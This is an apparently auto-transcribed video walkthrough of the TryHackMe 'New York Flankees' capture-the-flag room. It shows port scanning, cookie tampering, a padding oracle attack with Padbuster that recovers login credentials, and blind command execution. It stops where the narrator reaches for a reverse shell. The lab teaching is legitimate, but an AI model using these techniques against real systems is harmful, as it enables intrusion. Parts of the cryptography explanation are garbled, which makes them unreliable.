Hey, what's up everybody? I'm Perimal Jagan and I'm happy to see you once again. And in today's video, we are going to take Capture the Flag challenge from TryHackMe. It's actually an interesting challenge. It is not that easy unless you know what you are up against. When I was learning this challenge, I literally learned a new concept. I never did this, I never tried this before. So it was actually a new learning to me totally. Hopefully, if you haven't done this before, it will be an interesting learning for you as well. So without further ado, let me get you to that room. And now you're looking at the TryHackMe room, and the TryHackMe room is called New York Flankees. So when you see this name and also the logo, you could have assumed actually this is uh, there is a team, there is a baseball team in America based New York City, right? So yeah, it is actually an American professional baseball team. So they just took that name and kept it for this room. All right. And see the tagline: Can you, the rogue adventurer, break through Stephen's defenses to take control of his blog? So potential web application exploitation, right? Fine. Let's see and read this message. Before that, I'll start my mission. In the mystical realm of cyberspace, I think there are there is a complicated English involved in this. In the mystical realm of cyberspace, there is one dwelt a mischievous sorcerer named Stephen, known for his cunning wit and insatiable thirst for digital knowledge. Stephen crafted a wondrous digital domain known as a blog, but alas, not all were enchanted by his creations. Well, I think they are trying to post his blog, how the way his blog is built. That all the thing we need to do is to break his blog and take the control of the uh, web app. I think that's what they are trying to say. So it's actually a web application exploitation that we have to do. Fine. In this game of cat and mouse, who will emerge victorious? Will Stephen's defenses prove insurmountable, or will you, the rogue adventurer, triumph in your quest to dismantlement? Again, we need to exploit the web app, and you could see the questions, the list of questions that we've asked, right? Fine. It got the IP address, and to access this web application, all I need to do is to connect their VPN, right? Let me start my TMX session. Before I'm creating a new TMX session and just giving it NYF, the name, right? Fine. I go here, open VPN, and I need to go to my TryHackMe folder to grab that OpenVPN file. Yeah. Now I have connected to it. Let me change the name of this terminal, the window, and I'm opening a new session. I think I'm naming the session here. Yeah. Fine. I have connected to TryHackMe's network, and I could see my IP 10.14.86.9, and I'll try to ping this IP, the destination. I'm able to ping, and you could see the TTL value. It's 63. So it is just one value lesser than 64. So it mostly indicates Linux operating system. So we are up against a Linux machine. So by seeing the enumeration begins from this ping, this ICMP enumeration, with this TTL value, we can just infer the operating system that we are up against, right? All right, fine. For this, I need to run the Nmap scan first to see the list of services available. For that, you need to use sudo nmap -sc for default script, sv to enumerate the version, -on to store the results in the nmap format, and putting all the results in a file called nyf maybe, and the IP address in the last. Along with that, I'm using the -vv to enable the additional verbosity. So it will give the TTL value of every host. So this is the command that I need to use, but it will take some time, and I've already ran it and keeping it with me. To be honest with you, I admit that I already tried and I solved this challenge again, and I'm doing this once again just to showcase this incredible stuff to you. All right. I go here and try to catch this outcome, the nmap outcome to you. Right. Let me zoom out a bit. Yeah, look at this. It has totally 998 closed ports, so which means only two ports are open. One port is 22 and another port is 8080. 22 is obvious SSH, and you could see the banner open SSH, and it's an Ubuntu operating system. Fine. And let's notice this. It is actually the TTL value of this Ubuntu operating system. It says 60. Okay. And what about this? The port 8080. It says port. I mean the TTL value of 59. I think I actually ran this when I was taking this challenge for the first time. That's why you could see the change in this TTL value. Then I changed that VPN file, the VPN connection. So the TTL obviously varied. If you run this Nmap scan now, you would see the TTL value of 63, I suppose. Just for your information. Okay. And the port 8080, it says it's actually a web application, HTTP, and the TTL value is 59. I mean, not exactly. In the current case, the TTL value here in web app is one lesser than this SSH. So which means this could be a separate device, could be a container. I think this web application is running in a separate container, not on this machine. So that's what we can assume, right? Fine. Now it says Octoshape P2P streaming web service. I don't know how it found that name, Octoshape P2P. What about this? I mean, whatever the streaming service, Octoshape. Yeah, look at this. Let me search this. When I see the version, I used to check for any potential exploits available. I don't see any exploit in this case, so I just check. I'm just checking with Octoshape P2P web streaming service exploit, and I don't see any GitHub link or any potential exploits to this. Fine. First of all, let's explore this web app and see what we are up against. Port 8080, right? Yeah, port 8080, and the IP is 10.10.68.143. All right. I go here and slap that IP address in and 8080. And this is the blog that they were talking about, a fortified blog in their view. They are boasting this blog a lot. Okay, let's see. I see a word oracle, so this is actually a hint. I'll reveal that in a moment. But before that, so here is the hint, oracle. So just keep in mind. And once upon a time in the bustling city of New York, there was a young man named Stephen. Stephen had always been fascinated by cryptography, spending countless hours delving into intricacies of encryption algorithms and deciphering codes. And here is the hint, of course. So there is a cryptographic stuff involved in this room. So you need to learn a cryptographic technique to solve this stuff. And one day, while attending a baseball game baseball game of his beloved team, the Flankees, Stephen had a moment of inspiration as a crowd cheered and the players battled it out on the field. Stephen's mind raced with ideas. What if he could create some kind of custom authentication mechanism that didn't suffer from weaknesses of basic authentication? This blog is used to document Stephen's ideas and tests his implementation. It is sponsored by his company Oracle. So they say Stephen's company is Oracle, but it's again a hint. And also there is some cryptographical stuff involved in this challenge. All right, let me explore this. I'll try to check. When I hover my cursor on this blog, I could see the left bottom index.html, and this one debug.html, and this one is I think there is no link here at all. I open this and I get a login page here. I try some basic credential, admin, not now, never save. You could see it actually gets our parameters. Let me show that Nmap results once again. The supported method is only get, so we can only send get request to this web server, nothing much. All right, maybe I'll try admin password, so nothing happens. So we need to do something here. Maybe we can try some SQL injection, but I don't think, I mean, it is not vulnerable to SQL injection. As I already did, I am just telling this. I go again here and index.html, again it comes to the same page. Stephen.test, when I keep my cursor, I could see debug.html. Let me open it. And here is the hint. Stephen's debug blob. To do, implement custom authentication. So they added it in the to-do list, so which is something it to be configured. And to do, fix verbose error padding. So note it down all these stuffs and fix the verbose error related to padding. So this is actually a hint, padding. I'll tell you what I am up against, what I am about to do in a moment. Okay, before that, let me go here and the index page, and I click Control U to see the front end source code. Do I get any interesting stuff? Straight off the bat, I'm seeing a script, a JavaScript. So I'm just copying it where I can put. I just create a sublime stuff, index.js. As I retrieved it from the index page, I'm putting it here. So looks like it is defining something. Constant is logged in. Document.cookie includes the word logged in. It's actually, if is logged in cookie exists, they change the below text button to find me or debug. I think something is happening if we define a cookie with the name is logged in and its content with logged in. Okay, and you could see here add event listener to admin login button. Okay, something is happening here. Let me, okay, how can I do this? I go here to the front page. I could see admin login here, and I press Control Shift I to open the developer tools. And here in storage, I am adding a cookie. So in this cookie, I am adding the cookie name as is logged in. I think is I is small. Yeah, is logged in. And then logged in. I changed it. I actually set a cookie. I'm refreshing the page. You could see there is a subtle change. The admin login, the button changed to debug. Okay, let me go here to debug page, and I don't see anything except this page changed to exec.html. What happened at the backend? Let's see it with the network console. I could see the status is 401, unauthorized. So I am not authorized to access this page. Maybe this page contains something valuable, something lucrative. So that one we need to exploit. So okay, we need to see this, the content of this exec.html page. That is actually one of our objectives. All right, fine. I go to the front page again. I go to the project front page again. Here, since I said that cookie, I'm not getting that login button. So let me go and remove this. Set it to its previous state. I go and remove this cookie. Yeah. Again, it's changed to admin login. Fine. I go to debug page. So here I click the same Control U and see the front end source code. I'll see an interesting stuff here. Okay. So let me go here. I scroll down, and here is a function, a script of the front end source code. So let me grab this and put it in a new page. I'm saving it as maybe debug.js, as I grabbed it from a debug page. Yeah, I knew it's a JavaScript code. So here is the stuff, some lengthy blob. I don't know what it is. So let's explore this in a moment. I enable the word wrap. So okay, before doing this, I'll go and it's always a best practice to initiate the directory enumeration at the back end while you are experimenting, while you are doing some stuff. So let me do that, and also I'll start the burp suite, so it will be useful for us. Okay, I go to proxy, I'm turning off the interception, I go to target scope, and I'm adding it in the scope. Okay, I don't want to see any crap out of this. Okay, now my burp is ready. I go and initiate a directory enumeration. For that, what can I use? I use fuff this time. Fuff faster you fool -u, and I take this URL, slap it in the keyword fuzz, as I need to enumerate the directories: usr, share, word list, seglist, raft. Okay, discovery web content, raft, small words. I'm a huge fan of IPsec. I've seen IPsec tend to use this word list often, so I'm also preferring to do the same. All right, I need a file extension of .html, because I see every page ends with HTML. I want to see any other interesting page that ends any other interesting HTML page. So that's my objective here. Fine. I'm putting all the stuff in dir enum.out, not dir, dir enum.out. Command not found. What? Is there? What's wrong with this? -w is the word list. -e is for extension. Did I make any mistake? I added a word fuzz also. Comma listed, separate list of extensions. So this is the extension. This is how I need to mention. What's wrong with this? How about trying just HTML? No. Draft small words. I added the word list also properly. 8080 HTTP, that's the URL. Maybe it needs sudo. No, command not found. Yeah, I don't know what happened before. Now it's running. I could see login.html, index.html, debug.html straight off the bat. I yet to find that exec.html, that is also one of the pages. All right. Yeah, we got that as well. Fine. If we get anything else, then that would be an interesting stuff. Okay, I have found this, and there is a debug.html, and I have found an interesting JavaScript function that has some blob with it, I mean in that in the from the from the index page of the web application, I found it involved some cryptographical. I mean there are some cryptographical challenge involved in the CTF. So it why it could be. I mean it could be this one, right? This could be some cryptographical stuff. If we properly enumerate this, then we will get to know. I create a new session, and here I go. I'll check whether it is a base 64 encoded blob. 64-D to decrypt. I see some random blob. I think it is not a base 64 encoded string. It could be something else. I can see an URL here. It is actually referring to itself, localhost, and URL, the destination API debug. So we got a potential destination to try and give the request. It has some API in it. XML HTTP request is the function in JavaScript to give the web request. Okay. Now we actually need to put the URL. So this is the URL, and followed by this specific blob. Okay. So we have to form the URL, and let's substitute our destination IP with this localhost. I mean, let's substitute our destination IP with this. Yeah, correct. With this localhost. Fine. I go to Burp Suite, maybe, or before that I'll access it. Let me go here, slap that in. I cut this and put it here. Okay, and I take this blob and I send a request. So before that, let's see this. On ready state function xhr ready 4. If xhr ready, if this specific variable has the value 4 and its status is 200, it gives some response. Otherwise, it send error, failed to send request. Okay. Fine. I'll try to access this. I can see an interesting message, custom authentication message. Okay. Let me see this page, Control U. I don't see anything, but here in debug page, I see this program, right? So let me go to the debug page again, Control Shift I. I'm going to debug this page. I see this debug.html. Let me enlarge it. I go here. I want to see what is the value of this x ready state when this specific line hits. So whenever the page gets loaded, it executes this JavaScript, right? So I just set a breakpoint here and I reload. Now it hits the breakpoint, paused on the breakpoint. I just keep my cursor on this and I could see the ready state. It contains the value 4, but however it says the status of 0. It is not 200, right? So it's supposed to fail, but unfortunately, somehow I'm getting a different response, custom authentication success. I'm not getting this one, failed to send request. I don't know why. Maybe I need to learn a lot from this, learn more from this. But for now, I just wanted to showcase how to debug a web page, a JavaScript. Okay. All right. I close this. I go here again. I want to enable the burp interceptor and resend this request so that I can grab it in the burp suite. I send it to repeater. So here is that request. It gives me the custom authentication success message. I go and change this, or I completely remove this. Let's see what happens. I copy this completely and remove this, send this request. I see 404 not found. But when I add some random stuff, some random hexadecimal character, I see an error, decryption error, 500 internal server error. So this is the gist. This is a very important point to understand in this, with respect to this CTF. Okay, so when we give that correct blob, it gives us an error of custom authentication success. At the same time, when I give a wrong blob, for example, I just remove this 4 at the end and I keep 3 instead 4, and I send the request, again I get this decryption error. It says 500 internal server, 500 response, the response code is 500, and it says decryption error. So there is a clear indication of something weird that happened. Okay, so let me reveal that what I'm up against, what we are up against. We are actually need to perform an attack called oracle padding or padding oracle. So that's the hint given here already. Fix verbose error padding. So there is a verbose error padding. Whatever happened at the back end, some verbal communication happening between the web application and the client. That's what we were able to see here. Custom authentication success. When there is a wrong blob, it gives us decryption error. So this is the verbosity error that they were talking about. Fix the verbose error, and they yet to fix it. But since they didn't fix, the application is still vulnerable to oracle padding, right? So let me explain what is oracle padding before we are hitting our next exploitation step. So let me before that, I'll just keep the correct value. Fine. I close this verb, I turn it off. What if I send this now? Yeah, still works. Okay, that's fine. Now let me open a blog and explain what is oracle padding attack. It's actually an interesting concept. Stay with me. I'll try to explain this incredible concept to you. Okay. Oracle padding attack explanation. I found a couple of blogs very interesting. This one and a Medium blog. So these two blogs I referred, and I have learned some incredible stuff about this oracle padding attack from these two blogs. Okay, so let me bring this blog to you. Before that, yeah. Okay, now I go and explain what is oracle padding attack. So let's read through this. I'll read through this one. The oracle padding attack is type of a cryptographic attack targeting block cipher algorithms, especially when operating under cipher block chaining mode. So you might have seen this term CBC. It commonly comes up with the encryption algorithms like AES, DES, advanced encryption standard, like that. So this attack is all about exploiting any encryption protocol that comes with cipher block chaining. Okay, in this context, the term oracle refers to the system that discloses information about whether the padding of cryptographic message is correct or not, and that's the indication we have just witnessed. I go here, when I change this message, I got a different message, right? So that actually a clear indication. That's what the term oracle is all about. When the system indicates about that wrong message, wrong padding of that cryptographic message, then it indicates it's actually the term oracle. Okay, I hope I am making it clear. While our goal is to provide concise overview, we will refrain from delving too deeply into this. Okay, the block cipher. First of all, you need to understand what is block cipher. For example, let me explain that here in a moment. So we are having let me choose a pen here. Yeah, I think do I have this? I need to write on screen. Let me check. Okay, I'll explain what is block cipher first. First of all, let's see. You have a message. Okay, some message. The message may be sorry for this. Hello. Let me rewrite this. let's say we have a message hello, and we want to encrypt this using a block cipher algorithms. Okay, so for that, what we need to do, first of all, we need to split this message into various parts, various blocks. Then we encrypt each block. So that's why they call it as block cipher. They are just splitting that message into multiple hops. For example, HE into one block, and LL into one block, and O into one block, and also just to match the size of the block, because in block cipher every block has to be the same size. So they are adding some padding, they're adding some letters at the end, they're adding some content at the end. That's what they call it as padding. Okay, so they are actually splitting the message into blocks and they are encrypting it. So that's why they are calling it as block cipher. I hope it makes it clear. With the domain block of within the domain, the block cipher encryption data undergoes encryption one block at a time. So since they are splitting it into blocks, they are encrypting one block at a time, with the block length varying among different algorithms. When the length of the data intended for encryption is not multiple of block length, padding becomes necessary. So that's what that's what I'm trying to make it clear. Every block has to be with the same length. Okay, if the length varies, if the length is lesser than the intended length, they are adding some other content at the end, and that's what they call it as padding. Okay. And however, when examining encrypted data in block ciphers, determining the precise length of the original data is not straightforward task. Okay, fine. Yeah, that's what they're trying to say. So we are up against a blob. We are up against cryptographic blob, but there is a padding present in this blob, but we don't know what is the padding length. Finding that padding length is not going to be easy. So that's what they are mentioning here. Okay, and you could see the list of algorithms that use this block ciphers: advanced encryption standard, data encryption standard, 3DS, blowfish, 2fish. So these are the list of encryption standards that do use this block ciphers. Well, the padding scheme. Now I have say I've just mentioned, right? So we need to add some data to match that to bring that block length, the standard block length. For that we are adding something. The process is called padding, and the padding process is called PKCS7. So that's the method they are using for the padding. Okay, I don't want to read all this stuff. I just explain it here. So look at this. There is a text called exploit. Okay, and by default in CBC, in cipher chain blocking, cipher block chaining, you see the default length of that block. It should be either 8 or 16. Okay, keep that in mind. It should be 8 or 16. Here it's actually 8, but you see the list of characters in the plain text, it's actually 7. So just to fill that remaining character, they are adding one padding. They are adding one character called 01, the hexadecimal notation of 1. Okay, and why they are adding 1? Because there is only one character that has to be padded, so they are adding 1. And here in the second one, you see the word attack. There are 2 letters left for the number 8 to fill the block, and for that they are adding 2, because there are 2 characters to be filled. Okay, so for that they are using the number 2. If 3 characters to be filled, then they use number 3. If 4 characters to be filled, then they use number 4. So this is how this padding works in this PKCS7 method. And here I explain how this encryption works. So they actually split that plain text into various blocks. Okay, and as I said, let me draw this here. Let's say I have 2 blocks, some hello Peru, like this, some message I'm having. I just split my real text, the plain text, into 2 blocks. Okay, now I need to encrypt one block at a time, and you can see the plain text block. They are actually trying to use this XOR also in this specific encryption. This is actually an encryption process. I'll use this block to explain this encryption process because this will be easy. Just see this diagram and try to understand what is happening here. The plain text block, it is actually XORed with a value called IV. I'll explain what is the value IV here in a moment. But before that, just keep in mind it is actually being XORed with, the plain text is being XORed with IV, and it finds the encrypting algorithm, which is nothing but the encryption key. So just to get the encryption key, they are doing this XOR operation. So once the encryption key is found, it is actually used and to encrypt the encrypt the plain text message and get the Chyper text block. So this is how this first block get encrypted. Then once it gets encrypted, the second block to be encrypted with the use of this first Chyper text block. So let me explain this. You can see this diagram. The plain text, the second block comes here and it is getting XORed with the first Chyper text block, and the outcome is delivered to create the encryption key, and it is used to bring the Chyper text of the block 2. So this is how it is actually chained. Every block's encryption and decryption process is chained with the adjacent block's encryption or decryption process. That's why they are calling it as Chyper block chaining. So they are chaining that block's encryption and decryption process. So that's the thing. That is how the name is actually came. Okay. All right. I go here and you see this decryption block. So this is very important for us to crack this CTF or any CTF that you you are up against, because the encryption process, it is not our business. So we need to decrypt the block. We are already having a Chyper text. We need to decrypt that. For that, we need to focus on this. So let me explain what is happening here. The same process but opposite stuff. The Chyper text, it is actually used to XOR it with the decryption key. So let me explain here. First go to this last ciphertext block. So it is actually the decryption key is derived from this Chyper text, and the Chyper text block of the previous block, the Chyper text of previous block is brought and XORed with the decryption key, and it will finally reveal the plain text block. I hope it will be confusing. It will take some time to understand. I would highly recommend these two blocks. I would highly recommend reading these two blocks because it would help you to understand this attack in a better way. So let me tell you. I think this is also a useful stuff. Yeah, this is actually an encryption. You see, the plain text is actually brought with encryption initialization vector, and it is XORed. You can see this circle, it's the XOR operation. It is XORed, and the output is given and produced the encryption key, and this encryption key is used to encrypt the block. The Chyper block is produced. So once the Chyper block is produced, they are actually using the Chyper block 1 to XOR it with the plain text block 2, and they brought the encryption key and they use it to create the Chyper blocks 2. Like this, it goes in a chain process. Okay, this is the decryption process. You see, the Chyper text block, it is actually necessary to XOR it with the decryption key and produce the plain text. Now, why here? There is a term initialization vector. Why is that? When you use the previous or the next Chyper text block or plain text block in the Chyper block chaining, when it comes to the first block, you don't have a previous block. In this case, previous block. In this case, they brought a block called initialization vector. The initialization vector is also a random string with the similar size of the Chyper text block or a plain text block in case of encryption. So they brought this initialization vector just to assist the first block of encryption or decryption. I hope I'm making it clear. Okay. Now, if you see this upcoming GIF, you will get to know. First, look at this. They are actually, here they try to explain how this attack works. So let's see. But before that, I will explain what do we have here. So here, this is the decryption process of one block. Now we just have this hypertext block. We don't have this decryption key. We don't have this initialization vector, but we need to find this plain text block, right? We don't have anything. We just have this hypertext block, and this is where they are using some interesting topic. They are using some interesting methods to derive this plain text block. I'll explain how they are able to pull it off. We don't have initialization vector, we don't have decryption key, but we need plain text block. We just have this hypertext block. Okay, with this hypertext block alone, we are going to derive this plain text block. So let me explain how it's going to happen. And look at this. And here is a technique. They are actually using a dummy decryption key here with the same block length. They are using a decryption key. Here you can see the decryption key, but this is actually a fake value of decryption key. Okay, they are using some random value of decryption key initially, and what they are doing, they are actually I think you need to understand the XOR operation. So let me explain the XOR operation before we come here, because XOR is being used here, right? XOR operation. I need to show you some example. Yeah, look at this. So this is the XOR operation. So when you have the same values in both the parties A and B, the result will be 0. When you have a different values 1 and 0 or 0 and 1, you get the value of 1. So this is how the XOR encryption works. Just keep in mind, and I go here to explain that stuff. Now what they are doing, they are actually trying to XOR these two values. They are actually XORing this last block 2f, the last byte of this block. So that is how I should call. You can see every block. This is actually one block. It is splitted into bytes. I could see that hex bytes here. Okay, these are all hex bytes. So they are taking this last byte 2f and they XOR it with some value so that the plain text block's end should be 0, 1. So what could be this value? At the end, the value is 2e. When they XOR this 2f value with 2e, they will get the result of 0, 1. Their aim is to get the 0, 1 because that's the padding. That's the padding we've seen before, right? So when there is one character short to fill the block, they use the padding of 1. So that's what they are trying to say. That's what they're trying to brought here. So let me go here again. They brought that specific value 0, 1 since they used this 2e value in the last byte of initialization vector. So you understood this point, right? I'm moving down further, and here you could see the detailed operation. They found 0, 1, and now they are doing another stuff here. Okay, they brought 0, 1 and they found some initialization, the last string of initialization vector. Fine. Now I go to the next step, and here you see there is initialization vector and they are trying to bring the value of 0, 2. Let me explain what is the zeroing IV in a moment, but before that, try to see what is happening here. You could see they are bringing some value 0, 4, 0, 4, 0, 4, and they are just putting that same block here and they call it as padding. And the next one is 0, 5. So they bring 0, 5 here, they bring 0, 5 here, and the respective initialization vector byte value. And what they are saying, what they are doing is they are just taking that byte, whatever the value they set, and they are just trying to XOR it with the same initialization vector. I hope you get it. Now they said 0, 6. They just taking the 0. Let me highlight this here. I think it's very difficult to understand initially, but if I explain this properly, you will understand. Yeah, you see now they filled 0, 7. The value is 0, 7. They made it 0, 7 with help of this value 3, 5. Now they are bringing this 0, 7 here and they are XORing it with 3, 5. 0, 7, 3, 5. It gives this 3, 2 value. Hope you got this. The first process, we actually tweaked this initialization vector byte to bring the padding value, the padding value of plain text that we want. Then they just brought the same padding block, and they are doing the XOR operation between that initialization vector and the padding value. Here you see it's 09, and they bring 09 again and XOR it with 48, and they will get 41. Now this is how they form this zeroing IV. So they are forming IV called zeroing IV. Since we don't have initialization vector with us, they are using this method to derive this zeroing IV. Okay, they are just trying to use this random decryption key, and they try to predict this zeroing IV. So this is a very important piece of data to just do this operation and bring the padding block, and they are just using that padding block with the initialization vector, and they are XORing, and they are bringing the zeroing IV. Hope I am just making it clear. So this is the block. They are just blocking this. They are just bringing this block here. It will come in a moment. They brought it here, and they are trying to XOR it these two, and they derive this zeroing IV. Okay, we will get this zeroing IV at the end. Now let's see what this zeroing IV does. I'll go here and scroll down. This process followed until we have managed to build up the full zeroing IV. This brings us the second reason why zeroing IV is useful. Now we deriving a zeroing IV, why it is useful, what it does. One of the basic properties of XOR is, if we are XORing this IV with the block and the value gives 0, then it means both the values are same. That's what I just shown here. If we are XORing two values and it gives the result 0, that means those two values are equal. So that's what they are trying to say. So which means here the IV equal to block. That is nothing but we just recovered our decryption key by using some dummy or some random decryption. Sorry, let me correct this. I delete this. Yeah, okay. By using some dummy decryption key, we managed to derive the correct decryption key, the zeroing IV. Okay, now we got the decryption key. We got this ready. Now all we need to do is now we have recovered this. Now we can XOR it against the previous ciphertext or the IV to recover the corresponding plain text. So since we got this decryption key, now the process is very easy. So the decryption key is nothing but the encrypting algorithm that this blog writer referred. So here we got the decryption key. Now it is easy for us to decrypt it to plain text. Okay, so this is how they infer the decryption key, the correct encryption key, correct decryption key. So this is the interesting concept that I wanted to explain. This is actually just a theory. I hope I took a long time to explain this. I'm not sure whether I explained it properly, but I would highly recommend reading these two blocks. I'll keep the link of these two blocks in the description so that you can go through and try to understand what is happening. Okay, now I explained a lot of stuffs. How to exploit this? That's the big question. And if I see this blog, I was given a Python script. There is actually a script available. I can go here and grab this script and I try this. Otherwise, I can do some other thing. I think here also I see a Python script. Yeah, here also I'm given a Python script. I can use this. Otherwise, I have an interesting tool called Padbuster. I'm going to use that tool called Padbuster. So let me bring the tool, Padbuster. So here is the tool. So I'm going to use this tool to crack that Oracle padding attack, to orchestrate the Oracle padding attack. Fine. I go here and I actually see the correct blob here, and it gives the custom authentication success. Okay. Now I go and grab this URL, Padbuster. I used time in front of it. It is actually to orchestrate, to perform the attack. It just takes couple of steps, but before you are performing that, you must know what is happening at the back end, what is happening under the hood. That's why I took this time and explained the theory behind this attack, because to orchestrate this attack is not a big deal. It's actually a simple one, just one command, but what is happening behind, that's very important. That's why I took this time and explained. Fine. I go here. Now I need to bring that URL, because when I send the request to that URL, let's see this, http 10.10.68.43, and here is that message. Sorry. Yeah. Now this is the URL. When we send query to this URL, I could see the clear difference when I tweak this blob, and it gives the different message. Okay, now I got this, and I need to copy this encrypted blob separately. Yep. Yeah, I'm just putting it within a double quote. Okay, now what I need to do, let me open a separate, let me split this window and see the help menu of Padbuster. Pipe less. Okay, I see this head alone. Okay, here I'm mentioning the URL directly as an argument, and encrypted sample, and I'm giving the encrypted sample here within a double quote. And what else? I need to mention the block size, and I clearly mentioned it has to be either 16 or 8. So let me check whether did they give anything here. I could see they are using the block size of 16 in this blog. Yeah, let me see this one, signifying a block size of 16. So in both these blocks, they use the block size of 16. And additional information is this block size could be 8 also. Okay, so just for your information. All right, in our case it's gonna be 16. Padbuster, the block size I need to mention, and one more thing I need to mention is the encoding. By default, it considers it as a base 64 encoded, the blob, the encrypted blob. But here in our case, it is not base 64 encoded. We have already verified that it is actually a hexadecimal encoded, and I could see this as upper hex, because I see all are capital characters. I think that's what they denote here, upper hex and lower hex. So we are using upper hex. So I need to mention the value of 2 hyphen encoding space 2. So I need to mention that as well. Okay, along with this URL, encrypted sample, and the block size. Fine. The block size I mention it as 16, and hyphen encoding, and I mention it as 2 because it is upper hex. Okay, I'll close this. So this is the command. This is the command all we need. So this command will do the rest of the things for us. Okay, before that, okay, fine, I have 1 hour time and I'm initiating this. It will take some time. So what is going to do, it's actually I mentioned the block size as 16. So what it will do, it will split this entire blob into 16 how can I say 16 bytes. Okay, the 16 refers 16 bytes, so it will split 16 bytes. So if you split 16 bytes, then you will get almost 5 blocks, I suppose, because this blob, this encrypted blob has 160 characters, and you could see it at the bottom. So I highlighted this. So there are 160 characters, which means 2 characters 1 byte. Okay, each byte refers 4 bits. So 2 character refers 8 bits, that is 1 byte. Okay, now we got 160 characters, which means we have 80 bytes. If we split 80 into if we divide 80 by 16, we get 5. So there will be totally 5 blocks, and in 5 blocks the first block should be initialization vector. The first 16 bytes should be initialization vector, and the remaining 128 characters, I suppose. So that should be the 128 means 64. Remaining 64 bytes should be the block that we need to decrypt. Okay, so you will get to know once it started running. So it will take some time. I click this and run. Now you could see it is actually trying to validate this blob, the blob that we inserted. So if it is a valid blob, we mentioned the correct size and also the correct encoding scheme, then it will give us an option to choose. Okay, let's wait and see what's going to happen. I've never done this before, that's why I'm taking my time to explain this, because if you never experienced this, if you never tried this attack, then it will be an interesting thing, or it will be a good thing to have in your arsenal. Okay, let's try this. I think it will take some time. It will give this here in a moment. So once it gives that option, I need to choose that option. So once I chose that option, it will go and start cracking those chippers. Okay, so whatever the operation I mentioned so far in this blog, I think this blog, it gave it clearly, right, with the GIF, right? So this operation is actually deriving that deriving that IV, zeroing IV. With that zeroing IV, they need to crack that outcome. So there are a lot of things involved in this, so it will take some time, obviously. So I'll pause this here. Once the option is given, yeah, it's actually, we got that option. You see, ID 1 and 2, the frequency 1 255, status 200 500, and the length is 29 and 16. The length we mentioned is 16, and you see, enter the ID that matches the error condition. So this is the error condition 500, and we need to mention this one. Okay, the ID marked with star is recommended. So this is the ID number is 2. So I give 2 and enter. It will take some time. It will take at least some minutes to accomplish this cracking, because it is going to crack block by block. As I said, it's actually a chipper block chaining. So it is try to encrypt and decrypt this block by block at a time. So it will take some time. It split our blob into blocks, and it will try to decrypt block by block. Fine, I'll pause this video here. Once the first block is decrypted, I'll resume this. Now look at this. It actually cracked a block. There are totally 4 blocks. It actually cracked block 1, and it is giving us the result. You can see the plain text here. So it begins with Stephen : and it has some characters, some random characters. It is actually started cracking block 2. So as I said, it split 16 bytes. There are totally 80 bytes in that blob, 160 characters, 80 bytes, 16 bytes, one block, and the first block is IV. So it cracked the second block. I think I don't know in which block, in which order it's cracking the block. I think from the last it's cracking, or I think it's first. From first it is cracking. It actually cracked the block 1, because you could see it begins with Stephen's name. So this is the beginning. So it cracked the block 1. The block 1, actually the IV, it cracked the block 2, but it says block 1. Okay, there are totally 4 blocks of data that has to be cracked. It is now cracking block 2. Now I could have shown you what is happening under the hood by simply redirecting this traffic through Burp Suite, but now itself it is taking a lot of time. If I had forwarded it through Burp Suite, it would have taken forever to finish this. So that's why I didn't do that. Instead, I did one interesting stuff. I actually turned on the Wireshark, and I captured this stuff just a while ago while cracking this penultimate byte of block 1, and I actually got this outcome. And let's see, I filter HTTP. You see it sends bunch of requests. It actually tried different combination of bytes, and it gets the 500 internal servers all the time, but except one time. If I scroll down, I could see this one, it stands out. The response is okay. And let's see what it has. I click and follow the TCP stream and HTTP stream, and you could see this. So this is another combination, another valid blob that gives this custom authentication success. So it is similar to SQL injection. In SQL injection, what we do, we actually, based on the message that we get, we try to infer the characters of the database, right? Similarly, in this specific Oracle padding attack, it is actually trying different combination of encrypted blob. It is trying the different padding, and it tried to find the response from the server. So this is actually the important thing of Oracle padding, because we get the different response when we send the different padding. But what if we don't get a different message for the different padding? There is no indication at all. At the time also, I mean, even at the time, it is possible to crack this hash by just seeing the time difference of the response. If it is a valid padding, it will give the immediate response, I suppose. If it is a wrong padding, I think it will take a lot of time. The time difference is similar to time-based SQL injection. Okay, so by using that time difference also, you can infer the correct character, correct block. So I think that's the thing I wanted to explain here. Now it is cracking the block 2. So I'll resume this video once it cracked all the blocks. Eventually we will get the full plain text. We will get the complete plain text once it cracked all the 4 blocks. Okay, I'll pause this video here. All right, the Padbuster has just managed to crack all the 4 blocks, and you could see how long it took. It approximately took 56 minutes, which is more than what I expected. And you could see this is the blob that this is the plain text that we were trying to get. Okay, I'll go and open a text editor, crits.txt, and I put it here. Okay, I think wrong clipboard. Yeah, now I write this. Yeah, fine. I have these credentials now, and you could see what happened here exactly. I just scroll up. Every block had 16 bytes, right? So each byte, there were 256 tries. So there are 2 hexadecimal digits in each byte. So one digit has 16 characters. So 2 digits, 16 into 16, 256. So there are 256 combinations of unique hashes. Okay, I mean unique bytes, pardon me, unique bytes. So that is what happened here. So it tried all the combinations of bytes for every byte, and it found one block. Similarly, there were 4 blocks. So that's why it took longer. So this is the credential that we wanted. So we have seen a login page, right? So let's go directly to that login page and try to log in with that credential. Stephen1197. Let me grab it, this one. I'll bring it to my system clipboard. Xclip selection clipboard. Fine. What? Okay, I think I should be using the single quote. Fine. Now it copied. The username is Stephen1197. Stephen1197, and the password is in my clipboard, system clipboard. And I logged in. Look at this. I got this debug console. Now, when I go to this debug page, I see something different because I'm able to read the exec.html now. Earlier, I was not able to read this because I was not authenticated. It was unauthorized. Now I go to the system, the browser utility, and see it actually set the cookie. I logged in and it set to true, and there is a session cookie. Fine. Now I got this, and I also the admin flag. Now what I need to do, I think I should go to this TryHackMe page and slap the flag that I obtained, Stephen1197 : the password, and that is a flag. And I go here and fetch the flag from the admin panel. All right, now I obtained a couple of flags. Now all I need to do is, I see a page, I see actually a box to enter a command and execute. So looks like a command execution directly in this page. The page itself denotes exec. Okay, fine. Now dig around in the container and find the second flag. So looks like we need to grab the command line access through this command execution. So let me try. I think it shows all the command that I executed in past. ID. When I execute a command ID, so you can see it's only get request. Get request is accepted here. So it actually, when I enter the command ID, instead of giving my user details, user and group details, it gives okay, the message okay. Looks like it is successfully executing it. When I give who am I, instead of giving who am I, it is actually telling the message simply okay. So I don't see any option to to view my command outcome, but I can verify whether it is getting executed successfully or not. For example, if I try any command that is not exist, it is not giving any response. So let's confirm it with the browser tool. Go to networking. I go here and I reload this, and you see 500. 500 is internal server error. I'm not getting it. So, but when I execute this who am I, the command that exists, I'm getting the positive response, right? So this is the indication. Now what we could do, maybe we could grab the shell. I'll go to this verb suite and I rerun this. I want to redirect this to repeater, and here I can give the command what I want. Okay, now I go to Pentest Monkey website, Pentest Monkey 